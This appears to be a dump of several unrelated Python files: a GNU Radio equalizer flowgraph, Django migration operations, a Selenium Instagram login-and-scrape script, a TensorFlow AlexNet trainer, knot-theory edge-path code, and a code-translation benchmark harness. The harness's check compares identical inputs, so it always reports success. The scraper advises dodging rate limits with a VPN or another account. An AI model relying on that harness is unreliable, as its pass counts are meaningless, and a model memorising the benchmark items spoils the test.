        self.bpsym = bpsym = int(round(math.log(fsm.I())/math.log(2)))
        self.EsN0_dB = EsN0_dB = 2
        self.Es = Es = numpy.mean((numpy.square(numpy.abs(tot_mod[1]))))
        # Per-dimension noise variance for the requested Es/N0.
        self.noisevar = noisevar = 10**(-EsN0_dB/10.0) * Es /2.0
        self.block = block = bpsym*1000
        self.R = R = 100e3
        ##################################################
        # Blocks
        ##################################################
        self.trellis_viterbi_combined_xx_0 = trellis.viterbi_combined_fb(trellis.fsm(fsm), block/bpsym, -1, -1, tot_mod[0], (tot_mod[1]), digital.TRELLIS_EUCLIDEAN)
        self.qtgui_number_sink_0 = qtgui.number_sink(
            gr.sizeof_float,
            0,
            qtgui.NUM_GRAPH_HORIZ,
            1
        )
        self.qtgui_number_sink_0.set_update_time(0.10)
        self.qtgui_number_sink_0.set_title("BER")
        # GRC always emits ten slots of sink configuration; only slot 0 is used.
        labels = ['BER', '', '', '', '',
                  '', '', '', '', '']
        units = ['', '', '', '', '',
                 '', '', '', '', '']
        colors = [("black", "black"), ("black", "black"), ("black", "black"), ("black", "black"), ("black", "black"),
                  ("black", "black"), ("black", "black"), ("black", "black"), ("black", "black"), ("black", "black")]
        factor = [1, 1, 1, 1, 1,
                  1, 1, 1, 1, 1]
        for i in xrange(1):
            self.qtgui_number_sink_0.set_min(i, 0)
            self.qtgui_number_sink_0.set_max(i, 1)
            self.qtgui_number_sink_0.set_color(i, colors[i][0], colors[i][1])
            if len(labels[i]) == 0:
                self.qtgui_number_sink_0.set_label(i, "Data {0}".format(i))
            else:
                self.qtgui_number_sink_0.set_label(i, labels[i])
            self.qtgui_number_sink_0.set_unit(i, units[i])
            self.qtgui_number_sink_0.set_factor(i, factor[i])
        self.qtgui_number_sink_0.enable_autoscale(False)
        self._qtgui_number_sink_0_win = sip.wrapinstance(self.qtgui_number_sink_0.pyqwidget(), Qt.QWidget)
        self.top_layout.addWidget(self._qtgui_number_sink_0_win)
        self.fir_filter_xxx_0 = filter.fir_filter_fff(1, (fu.c_channel))
        self.fir_filter_xxx_0.declare_sample_delay(0)
        self.digital_chunks_to_symbols_xx_0_0 = digital.chunks_to_symbols_bf((modulation[1]), modulation[0])
        self.blocks_unpack_k_bits_bb_0 = blocks.unpack_k_bits_bb(bpsym)
        self.blocks_throttle_0 = blocks.throttle(gr.sizeof_char*1, R,True)
        self.blocks_pack_k_bits_bb_0 = blocks.pack_k_bits_bb(bpsym)
        self.blocks_null_sink_1 = blocks.null_sink(gr.sizeof_float*1)
        self.blocks_add_xx_1 = blocks.add_vff(1)
        self.blks2_error_rate_0 = grc_blks2.error_rate(
            type='BER',
            win_size=block*100,
            bits_per_symbol=1,
        )
        self.analog_random_source_x_0 = blocks.vector_source_b(map(int, numpy.random.randint(0, 2, 1007)), True)
        self.analog_noise_source_x_0 = analog.noise_source_f(analog.GR_GAUSSIAN, noisevar**0.5, -42)
        # Interactive Es/N0 slider wired to set_EsN0_dB.
        self._EsN0_dB_range = Range(-10, 30, 1, 2, 200)
        self._EsN0_dB_win = RangeWidget(self._EsN0_dB_range, self.set_EsN0_dB, 'Es/N0 (dB)', "counter_slider", float)
        self.top_layout.addWidget(self._EsN0_dB_win)
        ##################################################
        # Connections
        ##################################################
        self.connect((self.analog_noise_source_x_0, 0), (self.blocks_add_xx_1, 1))
        self.connect((self.analog_random_source_x_0, 0), (self.blks2_error_rate_0, 0))
        self.connect((self.analog_random_source_x_0, 0), (self.blocks_throttle_0, 0))
        self.connect((self.blks2_error_rate_0, 0), (self.qtgui_number_sink_0, 0))
        self.connect((self.blocks_add_xx_1, 0), (self.blocks_null_sink_1, 0))
        self.connect((self.blocks_add_xx_1, 0), (self.trellis_viterbi_combined_xx_0, 0))
        self.connect((self.blocks_pack_k_bits_bb_0, 0), (self.digital_chunks_to_symbols_xx_0_0, 0))
        self.connect((self.blocks_throttle_0, 0), (self.blocks_pack_k_bits_bb_0, 0))
        self.connect((self.blocks_unpack_k_bits_bb_0, 0), (self.blks2_error_rate_0, 1))
        self.connect((self.digital_chunks_to_symbols_xx_0_0, 0), (self.fir_filter_xxx_0, 0))
        self.connect((self.fir_filter_xxx_0, 0), (self.blocks_add_xx_1, 0))
        self.connect((self.trellis_viterbi_combined_xx_0, 0), (self.blocks_unpack_k_bits_bb_0, 0))
    def closeEvent(self, event):
        # Save window geometry so the next run restores it.
        self.settings = Qt.QSettings("GNU Radio", "viterbi_equalization")
        self.settings.setValue("geometry", self.saveGeometry())
        event.accept()
    # GRC-generated accessors: each setter propagates the new value to every
    # dependent variable and running block.
    def get_modulation(self):
        return self.modulation
    def set_modulation(self, modulation):
        self.modulation = modulation
        self.set_tot_mod(fu.make_isi_lookup(self.modulation,self.channel,False))
        self.set_fsm(trellis.fsm(len(self.modulation[1]),len(self.channel)))
        self.digital_chunks_to_symbols_xx_0_0.set_symbol_table((self.modulation[1]))
    def get_channel(self):
        return self.channel
    def set_channel(self, channel):
        self.channel = channel
        self.set_tot_mod(fu.make_isi_lookup(self.modulation,self.channel,False))
        self.set_fsm(trellis.fsm(len(self.modulation[1]),len(self.channel)))
    def get_tot_mod(self):
        return self.tot_mod
    def set_tot_mod(self, tot_mod):
        self.tot_mod = tot_mod
        self.trellis_viterbi_combined_xx_0.set_D(self.tot_mod[0])
        self.trellis_viterbi_combined_xx_0.set_TABLE((self.tot_mod[1]))
        self.set_Es(numpy.mean((numpy.square(numpy.abs(self.tot_mod[1])))))
    def get_fsm(self):
        return self.fsm
    def set_fsm(self, fsm):
        self.fsm = fsm
        self.trellis_viterbi_combined_xx_0.set_FSM(trellis.fsm(self.fsm))
    def get_bpsym(self):
        return self.bpsym
    def set_bpsym(self, bpsym):
        self.bpsym = bpsym
        self.set_block(self.bpsym*1000)
        self.trellis_viterbi_combined_xx_0.set_K(self.block/self.bpsym)
    def get_EsN0_dB(self):
        return self.EsN0_dB
    def set_EsN0_dB(self, EsN0_dB):
        self.EsN0_dB = EsN0_dB
        self.set_noisevar(10**(-self.EsN0_dB/10.0) * self.Es /2.0)
    def get_Es(self):
        return self.Es
    def set_Es(self, Es):
        self.Es = Es
        self.set_noisevar(10**(-self.EsN0_dB/10.0) * self.Es /2.0)
    def get_noisevar(self):
        return self.noisevar
    def set_noisevar(self, noisevar):
        self.noisevar = noisevar
        self.analog_noise_source_x_0.set_amplitude(self.noisevar**0.5)
    def get_block(self):
        return self.block
    def set_block(self, block):
        self.block = block
        self.trellis_viterbi_combined_xx_0.set_K(self.block/self.bpsym)
    def get_R(self):
        return self.R
    def set_R(self, R):
        self.R = R
        self.blocks_throttle_0.set_sample_rate(self.R)
def main(top_block_cls=viterbi_equalization, options=None):
    """Qt bootstrap: build the flow graph, run it, and stop it on app exit."""
    from distutils.version import StrictVersion
    # On Qt >= 4.5 honour the graphics-system preference from the GR config.
    if StrictVersion(Qt.qVersion()) >= StrictVersion("4.5.0"):
        style = gr.prefs().get_string('qtgui', 'style', 'raster')
        Qt.QApplication.setGraphicsSystem(style)
    qapp = Qt.QApplication(sys.argv)
    flowgraph = top_block_cls()
    flowgraph.start()
    flowgraph.show()
    def quitting():
        # Stop the scheduler and wait for its threads before Qt tears down.
        flowgraph.stop()
        flowgraph.wait()
    qapp.connect(qapp, Qt.SIGNAL("aboutToQuit()"), quitting)
    qapp.exec_()
if __name__ == '__main__':
    main()
|
<filename>exo_changelog/operations.py
from django.db.migrations.operations.base import Operation
from django.db import DEFAULT_DB_ALIAS, connections
class RunSQL(Operation):
    """
    Runs some raw SQL. A reverse SQL statement may be provided.
    Also accepts a list of operations that represent the state change effected
    by this SQL change, in case it's custom column/table creation/deletion.
    """
    # Sentinel value meaning "no SQL to execute in this direction".
    noop = ''

    def __init__(self, sql, reverse_sql=None, state_operations=None, hints=None, elidable=False):
        """
        Args:
            sql: SQL string, or list/tuple of statements (each optionally a
                 2-tuple of (sql, params)).
            reverse_sql: SQL to run when the operation is reversed, if any.
            state_operations: operations describing the equivalent state change.
            hints: router hints dict.
            elidable: whether the operation can be dropped when squashing.
        """
        self.sql = sql
        self.reverse_sql = reverse_sql
        self.state_operations = state_operations or []
        self.hints = hints or {}
        self.elidable = elidable
        # SQL is always executed against the default database connection.
        self.connection = connections[DEFAULT_DB_ALIAS]

    def deconstruct(self):
        """Return (name, args, kwargs) sufficient to recreate this operation."""
        kwargs = {
            'sql': self.sql,
        }
        if self.reverse_sql is not None:
            kwargs['reverse_sql'] = self.reverse_sql
        if self.state_operations:
            kwargs['state_operations'] = self.state_operations
        if self.hints:
            kwargs['hints'] = self.hints
        return (
            self.__class__.__name__,
            [],
            kwargs
        )

    @property
    def reversible(self):
        # Reversible only when reverse SQL was supplied.
        return self.reverse_sql is not None

    def state_forwards(self, app_label, state):
        # Delegate the in-memory state change to the declared state operations.
        for state_operation in self.state_operations:
            state_operation.state_forwards(app_label, state)

    def database_forwards(self, app_label, schema_editor, from_state, to_state):
        self._run_sql(self.sql)

    def database_backwards(self, app_label, schema_editor, from_state, to_state):
        if self.reverse_sql is None:
            raise NotImplementedError('You cannot reverse this operation')
        self._run_sql(self.reverse_sql)

    def describe(self):
        return 'Raw SQL operation'

    def _run_sql(self, sqls):
        # Bug fix: callers invoke this as self._run_sql(self.sql), but the old
        # signature also required a schema_editor argument that was immediately
        # shadowed by the ``with`` block below, so every call raised TypeError.
        with self.connection.schema_editor() as schema_editor:
            if isinstance(sqls, (list, tuple)):
                for sql in sqls:
                    params = None
                    if isinstance(sql, (list, tuple)):
                        # Each entry may be (sql, params).
                        elements = len(sql)
                        if elements == 2:
                            sql, params = sql
                        else:
                            raise ValueError('Expected a 2-tuple but got %d' % elements)
                    schema_editor.execute(sql, params=params)
            elif sqls != RunSQL.noop:
                # Split a raw SQL script into individual statements.
                statements = schema_editor.connection.ops.prepare_sql_script(sqls)
                for statement in statements:
                    schema_editor.execute(statement, params=None)
class RunPython(Operation):
    """
    Runs Python code in a context suitable for doing versioned ORM operations.
    """
    # Cannot be expressed as SQL, so it never reduces during squashing.
    reduces_to_sql = False

    def __init__(self, code, reverse_code=None, atomic=None, hints=None, elidable=False):
        """
        Args:
            code: zero-argument callable run on forwards migration.
            reverse_code: zero-argument callable run on backwards migration.
            atomic: override for transactional execution (kept for API parity).
            hints: router hints dict.
            elidable: whether the operation can be dropped when squashing.
        """
        self.atomic = atomic
        # Forwards code
        if not callable(code):
            raise ValueError('RunPython must be supplied with a callable')
        self.code = code
        # Reverse code
        if reverse_code is None:
            self.reverse_code = None
        else:
            if not callable(reverse_code):
                raise ValueError('RunPython must be supplied with callable arguments')
            self.reverse_code = reverse_code
        self.hints = hints or {}
        self.elidable = elidable

    def deconstruct(self):
        """Return (name, args, kwargs) sufficient to recreate this operation."""
        kwargs = {
            'code': self.code,
        }
        if self.reverse_code is not None:
            kwargs['reverse_code'] = self.reverse_code
        if self.atomic is not None:
            kwargs['atomic'] = self.atomic
        if self.hints:
            kwargs['hints'] = self.hints
        return (
            self.__class__.__name__,
            [],
            kwargs
        )

    @property
    def reversible(self):
        return self.reverse_code is not None

    def state_forwards(self, app_label, state):
        # RunPython objects have no state effect. To add some, combine this
        # with SeparateDatabaseAndState.
        pass

    def database_forwards(self, app_label, schema_editor, from_state, to_state):
        # RunPython has access to all models. Ensure that all models are
        # reloaded in case any are delayed.
        from_state.clear_delayed_apps_cache()
        self.code()

    def database_backwards(self, app_label, schema_editor, from_state, to_state):
        if self.reverse_code is None:
            raise NotImplementedError('You cannot reverse this operation')
        self.reverse_code()

    def describe(self):
        return 'Raw Python operation'

    @staticmethod
    def noop(apps=None, schema_editor=None):
        # Bug fix: database_forwards()/database_backwards() invoke the stored
        # callable with no arguments, so the old mandatory (apps,
        # schema_editor) parameters made RunPython(RunPython.noop) raise a
        # TypeError. Defaults keep it callable both ways.
        return None
|
import selenium
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
import time
from webdriver_manager.chrome import ChromeDriverManager
# Module-level flag set by login() once Instagram appears to have rate
# limited the session; getuser() refuses to run while it is True.
ratelimited=False
def login(username,password):
    """Open Chrome, log in to instagram.com with the given credentials, and
    dismiss the post-login notifications prompt.

    Side effects: binds the module-global ``browser`` (a Chrome WebDriver)
    and may set the module-global ``ratelimited`` flag.
    """
    global browser
    global ratelimited
    browser = webdriver.Chrome(ChromeDriverManager().install())
    browser.get('https://www.instagram.com')
    browser.implicitly_wait(1)
    try:
        # The login form's first two inputs are username and password.
        userinput = browser.find_elements_by_css_selector('form input')[0]
        passwordinput = browser.find_elements_by_css_selector('form input')[1]
        userinput.send_keys(username)
        passwordinput.send_keys(password)
        passwordinput.send_keys(Keys.ENTER)
        time.sleep(3)
        browser.implicitly_wait(1)
        try:
            # NOTE(review): 'cmbtv' is presumably the "Not Now" button of the
            # notifications dialog -- inferred from the click, confirm.
            notification = browser.find_element_by_class_name('cmbtv')
            notification.click()
        except selenium.common.exceptions.NoSuchElementException:
            # A missing post-login dialog is treated as evidence of rate
            # limiting rather than a normal login.
            print(
                "Instagram has ratelimied you(only lasts like 10 minutes), you can try a VPN or a different account, I will try find a work around this in BetterInstagram 0.0.1+")
            ratelimited = True
            return
    except IndexError:
        # Form inputs not rendered yet: restart the browser and retry.
        # NOTE(review): recursion has no retry cap -- could loop indefinitely.
        browser.quit()
        login(username, password)
def getuser(username):
    """Scrape the public profile page of ``username`` and return a dict with
    keys: username, name, biography, posts, followers, following,
    is_verified, website, are_you_following, url.

    Returns None when rate limited or when Instagram forces a login page.
    Reuses the module-global ``browser`` if login() already created it,
    otherwise starts a fresh Chrome instance.
    """
    global browser
    global ratelimited
    if ratelimited:
        return
    userinfo={}
    span=[]
    #Username
    userinfo["username"] = username
    #Setup for no login call
    try:
        browser.get(f'https://www.instagram.com/{username}')
    except NameError:
        # login() was never called, so ``browser`` is unbound: start one now.
        browser = webdriver.Chrome(ChromeDriverManager().install())
        browser.get(f'https://www.instagram.com/{username}')
    #Name & Setup
    try:
        # NOTE(review): class names like "rhpdm"/"g47SY" are obfuscated
        # Instagram CSS classes and break whenever the site is redeployed.
        name = browser.find_element_by_class_name("rhpdm")
        userinfo["name"]=name.text
    except selenium.common.exceptions.NoSuchElementException:
        if browser.current_url=='https://www.instagram.com/accounts/login/':
            print("it seems instagram is forcing a login for this URL.")
            return
        else:
            userinfo["name"] = ''
    # #Bio Placeholder
    userinfo["biography"]=""
    #Number Info
    # Posts / followers / following counters, in page order.
    headinfo = browser.find_elements_by_class_name("g47SY")
    userinfo["posts"]=headinfo[0].text
    userinfo["followers"] = headinfo[1].text
    userinfo["following"] = headinfo[2].text
    #Verified
    try:
        isverified=browser.find_element_by_class_name("mTLOB")
    except selenium.common.exceptions.NoSuchElementException:
        isverified=False
    try:
        if isverified.text=="Verified":
            isverified=True
    except AttributeError:
        # isverified is already the boolean False.
        pass
    userinfo["is_verified"]=isverified
    #Website
    try:
        website=browser.find_element_by_class_name("yLUwa")
    except selenium.common.exceptions.NoSuchElementException:
        website= None
    try:
        userinfo["website"]=website.text
    except AttributeError:
        # No website element found: store None.
        userinfo["website"] = website
    #You are following
    try:
        youarefollowing=browser.find_element_by_class_name("_5f5mN")
    except selenium.common.exceptions.NoSuchElementException:
        youarefollowing = browser.find_element_by_class_name("sqdOP")
    # Button labelled "Follow" means we are NOT following this account.
    if youarefollowing.text == "Follow":
        youarefollowing=False
    else:
        youarefollowing=True
    userinfo["are_you_following"]=youarefollowing
    #URL
    userinfo["url"]=browser.current_url
    #Bio
    # Heuristic bio extraction: collect all <span> texts, then repeatedly
    # filter out the known non-bio strings until (hopefully) the bio is left.
    bio=browser.find_elements_by_tag_name("span")
    biocount=0
    for x in bio:
        span.append(str(x.text))
    # NOTE(review): each pass mutates ``span`` while iterating it, which
    # skips elements -- the 10 passes compensate for that; fragile.
    while biocount<10:
        for i in span:
            if i == userinfo["posts"]:
                span.remove(i)
            if i == userinfo["followers"]:
                span.remove(i)
            if i == userinfo["following"]:
                span.remove(i)
            if i == f'{userinfo["posts"]} posts':
                span.remove(i)
            if i == '':
                span.remove(i)
            if i == 'Verified':
                span.remove(i)
            if i == 'Follow':
                span.remove(i)
        biocount+=1
    # NOTE(review): raises IndexError when every span was filtered out.
    if span[0]=='POSTS' or span[0][:12]=='Followed by ':
        span[0]=""
    userinfo["biography"]=span[0]
    return userinfo
"""
Written by <NAME> - 2017
models training on ImageNet
"""
import argparse
import os.path
import time
import tensorflow as tf
import tensorflow.contrib.eager as tfe
from models.alexnet import AlexNet
from data import ImageNetDataset
from config import Configuration
import utils as ut
# Eager execution must be enabled once, before any tensors are created
# (TF 1.x contrib eager API).
tfe.enable_eager_execution()
class Trainer(object):
    """Eager-mode training driver: runs SGD-with-momentum over the training
    set, periodically logging loss/accuracy summaries, validating, and
    checkpointing all variables (network + optimizer + counters)."""
    def __init__(self, cfg, net, trainingset, valset, resume):
        # cfg: Configuration with hyperparameters and paths.
        # net: the model (callable on an image batch).
        # trainingset / valset: ImageNetDataset wrappers exposing .dataset.
        # resume: when True, restore all variables from the latest checkpoint.
        self.cfg = cfg
        self.net = net
        self.trainingset = trainingset
        self.valset = valset
        #self.optimizer = tf.train.AdamOptimizer(learning_rate=self.cfg.LEARNING_RATE)
        self.optimizer = tf.train.MomentumOptimizer(learning_rate=self.cfg.LEARNING_RATE, momentum=self.cfg.MOMENTUM)
        self.global_step = tf.train.get_or_create_global_step()
        # Epoch counter is a variable so it survives checkpoint save/restore.
        self.epoch = tfe.Variable(0, name='epoch', dtype=tf.float32, trainable=False)
        self.writer = tf.contrib.summary.create_summary_file_writer(self.cfg.SUMMARY_PATH)
        # Everything that must be saved/restored together.
        self.all_variables = (self.net.variables
                              + self.optimizer.variables()
                              + [self.global_step]
                              + [self.epoch])
        if resume:
            tfe.Saver(self.all_variables).restore(tf.train.latest_checkpoint(self.cfg.CKPT_PATH))
    def loss(self, mode, x, y):
        """
        Computes the loss for a given batch of examples
        Args:
            mode, string 'train' or 'val'
            x, tf tensor representing a batch of images
            y, tf tensor representing a batch of labels
        Returns:
            the loss between the predictions on the images and the groundtruths
        """
        pred = self.net(x)
        loss_value = tf.losses.softmax_cross_entropy(onehot_labels=y, logits=pred)
        # L2 weight decay over ALL network variables, scaled by cfg.LAMBDA.
        weight_decay = tf.reduce_sum(self.cfg.LAMBDA * tf.stack([tf.nn.l2_loss(v) for v in self.net.variables]))
        total_loss = loss_value + weight_decay
        tf.contrib.summary.scalar(mode + '/loss', total_loss)
        return total_loss
    def accuracy(self, mode, x, y):
        """
        Computes the accuracy for a given batch of examples
        Args:
            mode, string 'train' or 'val'
            x, tf tensor representing a batch of images
            y, tf tensor representing a batch of labels
        Returns:
            the accuracy of the predictions on the images and the groundtruths
        """
        pred = tf.nn.softmax(self.net(x))
        # Fraction of samples whose argmax prediction matches the label.
        accuracy_value = tf.reduce_sum(
            tf.cast(
                tf.equal(
                    tf.argmax(pred, axis=1, output_type=tf.int64),
                    tf.argmax(y, axis=1, output_type=tf.int64)
                ),
                dtype=tf.float32
            )
        ) / float(pred.shape[0].value)
        tf.contrib.summary.scalar(mode +'/accuracy', accuracy_value)
        return accuracy_value
    def train(self):
        """
        Training procedure
        """
        start_time = time.time()
        step_time = 0.0
        with self.writer.as_default():
            with tf.contrib.summary.record_summaries_every_n_global_steps(self.cfg.DISPLAY_STEP):
                # Resume from the persisted epoch counter.
                for e in range(self.epoch.numpy(), self.cfg.EPOCHS):
                    tf.assign(self.epoch, e)
                    for (batch_i, (images, labels)) in enumerate(tfe.Iterator(self.trainingset.dataset)):
                        self.global_step = tf.train.get_global_step()
                        step = self.global_step.numpy() + 1
                        step_start_time = int(round(time.time() * 1000))
                        # minimize() computes gradients of the closure and
                        # applies them, advancing global_step.
                        self.optimizer.minimize(lambda: self.loss('train', images, labels), global_step=self.global_step)
                        step_end_time = int(round(time.time() * 1000))
                        step_time += step_end_time - step_start_time
                        if (step % self.cfg.DISPLAY_STEP) == 0:
                            l = self.loss('train', images, labels)
                            a = self.accuracy('train', images, labels).numpy()
                            print ('Epoch: {:03d} Step/Batch: {:09d} Step mean time: {:04d}ms \nLoss: {:.7f} Training accuracy: {:.4f}'.format(e, step, int(step_time / step), l, a))
                        if (step % self.cfg.VALIDATION_STEP) == 0:
                            # Evaluate on a single validation batch.
                            val_images, val_labels = tfe.Iterator(self.valset.dataset).next()
                            l = self.loss('val', val_images, val_labels)
                            a = self.accuracy('val', val_images, val_labels).numpy()
                            int_time = time.time() - start_time
                            print ('Elapsed time: {} --- Loss: {:.7f} Validation accuracy: {:.4f}'.format(ut.format_time(int_time), l, a))
                        if (step % self.cfg.SAVE_STEP) == 0:
                            tfe.Saver(self.all_variables).save(os.path.join(self.cfg.CKPT_PATH, 'net.ckpt'), global_step=self.global_step)
                            print('Variables saved')
if __name__ == '__main__':
    parser = argparse.ArgumentParser()
    parser.add_argument('--resume', help='Resume the training from the last checkpoint', action='store_true')
    args = parser.parse_args()
    cfg = Configuration()
    net = AlexNet(cfg, training=True)
    trainingset = ImageNetDataset(cfg, 'train')
    valset = ImageNetDataset(cfg, 'val')
    if not os.path.exists(cfg.CKPT_PATH):
        os.makedirs(cfg.CKPT_PATH)
    if tfe.num_gpus() > 0:
        # Pin the whole training run to the first GPU when one is available.
        with tf.device('/gpu:0'):
            trainer = Trainer(cfg, net, trainingset, valset, args.resume)
            trainer.train()
    else:
        # Bug fix: the CPU fallback previously called
        # Trainer(cfg, net, args.resume), dropping trainingset/valset and
        # raising a TypeError before training could start.
        trainer = Trainer(cfg, net, trainingset, valset, args.resume)
        trainer.train()
# Copyright (c) 2019-present, Facebook, Inc.
# All rights reserved.
#
# This source code is licensed under the license found in the
# LICENSE file in the root directory of this source tree.
#
def f_gold(arr, n):
    """Print every zero-sum triplet among the first ``n`` elements of ``arr``.

    For each pair (arr[i], arr[j]) with i < j, checks whether the value
    x = -(arr[i] + arr[j]) was already seen between i and j; if so, prints
    "x arr[i] arr[j]". Prints "No Triplet Found" when no triplet exists.
    Idiom cleanup only: PEP 8 spacing, ``if not found`` instead of
    ``found == False``; output is unchanged.
    """
    found = False
    for i in range(n - 1):
        # Values arr[i+1 .. j-1] seen so far for this fixed first element.
        seen = set()
        for j in range(i + 1, n):
            x = -(arr[i] + arr[j])
            if x in seen:
                print(x, arr[i], arr[j])
                found = True
            else:
                seen.add(arr[j])
    if not found:
        print("No Triplet Found")
#TOFILL
if __name__ == '__main__':
    # Each tuple is (array, n); the function only inspects the first n items.
    param = [
        ([1, 7, 12, 18, 18, 25, 26, 28, 29, 33, 33, 37, 39, 39, 53, 54, 55, 59, 61, 63, 63, 65, 66, 68, 68, 71, 71, 77, 81, 85, 90, 93, 94, 95, 97],18,),
        ([38, 68, 16, 96, -10, 6, 86, -42, -66, -2, -10, 48, 16, -28, 92, -24, 0, 46, -58, -58, 56, -70, 10, -2, -92, -80, 14, -78, 16, -84, -88, 42, -24, 6, 86, 82, 84],19,),
        ([0, 0, 0, 0, 1, 1, 1, 1],6,),
        ([45],0,),
        ([-80, -68, -54, -44, -40, -38, -32, -28, -22, -18, -12, -10, 14, 24, 38, 38, 40, 42, 46, 46, 64, 64, 66, 68, 68, 68, 70, 96],20,),
        ([0, 0, 0, 0, 0, 1, 0, 0, 0, 1, 1, 1, 1, 0],13,),
        ([1, 3, 4, 6, 8, 9, 10, 10, 11, 17, 17, 21, 22, 22, 25, 32, 34, 38, 46, 46, 48, 51, 58, 59, 62, 63, 64, 65, 70, 70, 72, 72, 72, 74, 77, 78, 81, 82, 83, 89, 90, 92, 95, 97],43,),
        ([-70, 78, 70, 20, -52, 36, -42, 34, -56, -94],9,),
        ([0, 0, 0, 0, 1, 1, 1, 1, 1],7,),
        ([72, 50, 10, 44, 66, 67, 76, 19, 3, 24, 76, 56, 53, 42, 15, 50, 86, 43, 77, 28, 42, 65, 92, 73, 60, 86, 52, 65],21,)
    ]
    # Inputs fed to the candidate translation f_filled; duplicates `param`.
    filled_function_param = [
        ([1, 7, 12, 18, 18, 25, 26, 28, 29, 33, 33, 37, 39, 39, 53, 54, 55, 59, 61, 63, 63, 65, 66, 68, 68, 71, 71, 77, 81, 85, 90, 93, 94, 95, 97],18,),
        ([38, 68, 16, 96, -10, 6, 86, -42, -66, -2, -10, 48, 16, -28, 92, -24, 0, 46, -58, -58, 56, -70, 10, -2, -92, -80, 14, -78, 16, -84, -88, 42, -24, 6, 86, 82, 84],19,),
        ([0, 0, 0, 0, 1, 1, 1, 1],6,),
        ([45],0,),
        ([-80, -68, -54, -44, -40, -38, -32, -28, -22, -18, -12, -10, 14, 24, 38, 38, 40, 42, 46, 46, 64, 64, 66, 68, 68, 68, 70, 96],20,),
        ([0, 0, 0, 0, 0, 1, 0, 0, 0, 1, 1, 1, 1, 0],13,),
        ([1, 3, 4, 6, 8, 9, 10, 10, 11, 17, 17, 21, 22, 22, 25, 32, 34, 38, 46, 46, 48, 51, 58, 59, 62, 63, 64, 65, 70, 70, 72, 72, 72, 74, 77, 78, 81, 82, 83, 89, 90, 92, 95, 97],43,),
        ([-70, 78, 70, 20, -52, 36, -42, 34, -56, -94],9,),
        ([0, 0, 0, 0, 1, 1, 1, 1, 1],7,),
        ([72, 50, 10, 44, 66, 67, 76, 19, 3, 24, 76, 56, 53, 42, 15, 50, 86, 43, 77, 28, 42, 65, 92, 73, 60, 86, 52, 65],21,)
    ]
    n_success = 0
    for i, parameters_set in enumerate(param):
        # f_filled is injected at the #TOFILL marker by the harness generator.
        f_filled(*(filled_function_param[i]))
        f_gold(*parameters_set)
        # NOTE(review): this compares the two INPUT tuples (which are copies of
        # each other), not the functions' outputs, so it always counts a
        # success. Presumably the generator intended to diff captured stdout
        # of f_filled vs f_gold — verify against the harness template.
        if parameters_set == filled_function_param[i]:
            n_success+=1
    print("#Results: %i, %i" % (n_success, len(param)))
# Written by <NAME> <<EMAIL>>
#
# Version 1.0. Dec 4, 1998.
# Version 1.3 Nov 14, 2020. Made work with Python 3.*
from gcd_tools import *
# The following two classes are used to store the vertices of an edge
# path. The first is denoted <p/q> in the paper. I will try to
# insure that q is always > 0, and the gcd(p,q) = 1.
@total_ordering
class vertex_of_D:
    """A vertex <p/q> of the diagram D (denoted <p/q> in the paper).

    Invariant: q > 0 and gcd(p, q) = 1.  Ordering comes from the underlying
    fraction; @total_ordering fills in the remaining comparisons from
    __eq__ and __lt__.
    """
    # can take either a fraction or a pair of integers
    def __init__(self, p, q="noarg"):
        if q == "noarg":
            # single argument: p is already a frac; copy to avoid aliasing
            self.frac = p.copy()
        else:
            self.frac = frac(p,q)
    def __repr__(self):
        return "<%s>" % self.frac
    def __eq__(self, other):
        if not isinstance(other, vertex_of_D):
            return False
        return self.frac == other.frac
    def __lt__(self, other):
        if not isinstance(other, vertex_of_D):
            raise ValueError
        return self.frac < other.frac
    def p(self):
        # numerator
        return self.frac.t
    def q(self):
        # denominator (always > 0 by the class invariant)
        return self.frac.b
    def u(self):
        # u coordinate of the vertex: (q - 1)/q
        return frac(self.frac.b - 1, self.frac.b)
    def v(self):
        # v coordinate p/q, returned as a copy so callers may mutate it
        return self.frac.copy()
    # min num of arcs needed to realize this diagram
    def num_arcs(self):
        return 1
    # returns the corresponding fraction in the collasped diagram with
    # only three vert.
    def reduced(self):
        return frac(self.frac.t % 2, self.frac.b % 2)
    # finds the two leftward neighbors of a vertex of T
    def leftward_neighbors(self):
        # The two vertices to the left of <p/q> are <r/s>
        # where sp - rq = +/-1 and s < q
        p, q = self.frac.t, self.frac.b
        g, s, r = euclidean_algorithm(p, q)  # 1 = sp + rq
        if g != 1 or q <= 1: raise ValueError("bad vertex %i,%i" % (p,q))
        # change so sp - rq = +/-1 and r > 0
        r = -r
        if r < 0: r, s = -r, -s
        # all solutions of s'p - r'q = +/-1 are of the form
        # s' = s + a*q, r' = r + a*p
        a = -s//q
        # return so that the vertex with larger v coordinate is second
        ret = [vertex_of_D (r + a*p, s + a*q), vertex_of_D (r + (a + 1)*p, s + (a + 1)*q)]
        if ret[0] > ret[1]:
            ret.reverse()
        return ret
# the second kind of vertex in an edge path is k/m <p/q> + (m - k)/m <r/s>.
class interior_of_edge_of_D:
    """A point in the interior of an edge of D: (k/m)<p/q> + ((m-k)/m)<r/s>.

    Holds three fractions; the weight k/m must lie in [0, 1].
    """

    def __init__(self, pq, rs, km):
        # Keep private copies so later mutation of the arguments is harmless.
        self.pq = pq.copy()
        self.rs = rs.copy()
        self.km = km.copy()
        if not 0 <= km <= 1:
            raise ValueError("need 0 <= km <=1")

    # Numerator/denominator accessors for the two endpoints.
    def p(self):
        return self.pq.t

    def q(self):
        return self.pq.b

    def r(self):
        return self.rs.t

    def s(self):
        return self.rs.b

    def __repr__(self):
        return "%s<%s> + %s<%s>" % (self.km, self.pq, 1 - self.km, self.rs)

    def __eq__(self, o):
        if not isinstance(o, interior_of_edge_of_D):
            return False
        return (self.pq, self.rs, self.km) == (o.pq, o.rs, o.km)

    def num_arcs(self):
        """Minimal number of arcs needed to realize this curve system."""
        # On a horizontal edge (<p/q> == <r/s>) only k arcs are required.
        return self.km.t if self.pq == self.rs else self.km.b
# Decides if two vertices of D are joined by an edge
def joined_by_edge(v, w):
    """True when vertices v and w of D span an edge, i.e. |p1*q2 - q1*p2| = 1."""
    if not (isinstance(v, vertex_of_D) and isinstance(w, vertex_of_D)):
        raise TypeError
    determinant = v.p() * w.q() - v.q() * w.p()
    return abs(determinant) == 1
class edgepath:
    """An edge path for one tangle: a list of D-vertices read left to right."""
    def __init__(self, tangle_num, given_path):
        self.tangle = tangle_num  # which tangle this is an edge path for
        self.path = given_path    # list of vertices from left to right
        self.r_value = self.compute_final_r_value()
        self.completely_reversible = self.decide_reversibility()
    def __getitem__(self, i): return self.path[i]
    def __len__(self): return len(self.path)
